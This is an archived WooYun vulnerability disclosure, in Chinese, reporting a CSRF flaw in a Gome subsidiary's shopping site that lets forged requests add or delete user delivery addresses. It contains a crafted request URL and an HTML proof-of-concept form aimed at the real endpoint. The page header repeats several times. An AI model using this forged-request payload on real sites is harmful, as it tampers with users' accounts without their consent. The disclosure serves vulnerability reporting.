国美旗下商城存在CSRF漏洞 | wooyun-2015-0128126| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128126

漏洞标题：国美旗下商城存在CSRF漏洞

漏洞作者：路人甲

提交时间：2015-07-21 15:24

修复时间：2015-07-26 15:26

公开时间：2015-07-26 15:26

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-21：细节已通知厂商并且等待厂商处理中
2015-07-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

国美旗下商城存在CSRF漏洞

详细说明：

http://www.multigold.com.cn/

问题在收货地址，可删除可添加
添加收货地址

http://member.multigold.com.cn/account/memberInfo_saveMemberAddress?newtime=1437460773098&isDefault=N&address1=%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&fullAddress=%E5%A4%A9%E6%B4%A5%E5%A4%A9%E6%B4%A5%E5%B8%82%E6%9C%9D%E9%98%B3%E5%8C%BA%E4%BA%94%E7%8E%AF%E9%87%8C%E5%B7%A6%E5%AE%B6%E5%BA%84%E3%80%81%E6%96%B0%E6%BA%90%E9%87%8C%E5%95%8A%E5%A4%A7%E7%A5%9E%E5%A4%A7%E5%A4%9A%E6%98%AF&post=111111&provinceId=12000000&cityId=12010000&areaId=11010200&streetId=11010203&consignee=%E5%95%8A%E5%AE%9E%E6%89%93%E5%AE%9E%E5%A4%A7%E5%B8%88%E7%9A%84&mobile1=13333333331&isDelete=N

漏洞证明：

删除收货地址 id随便改
POC

<html>
  <body>
    <form action="http://member.multigold.com.cn/account/memberInfo_updateMemberAddress?newtime=1437462010956" method="POST">
      <input type="hidden" name="memberAddressId" value="3800" />
      <input type="hidden" name="isDefault" value="" />
      <input type="hidden" name="address1" value="" />
      <input type="hidden" name="fullAddress" value="" />
      <input type="hidden" name="post" value="" />
      <input type="hidden" name="provinceId" value="" />
      <input type="hidden" name="cityId" value="" />
      <input type="hidden" name="areaId" value="" />
      <input type="hidden" name="consignee" value="" />
      <input type="hidden" name="mobile1" value="" />
      <input type="hidden" name="isDelete" value="Y" />
      <input type="hidden" name="tel" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

修复方案：

token

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-26 15:26

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128126

漏洞标题：国美旗下商城存在CSRF漏洞

相关厂商：国美控股集团

漏洞作者：路人甲

提交时间：2015-07-21 15:24

修复时间：2015-07-26 15:26

公开时间：2015-07-26 15:26

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128126

漏洞标题：国美旗下商城存在CSRF漏洞

相关厂商：国美控股集团

漏洞作者： 路人甲

提交时间：2015-07-21 15:24

修复时间：2015-07-26 15:26

公开时间：2015-07-26 15:26

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0128126"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云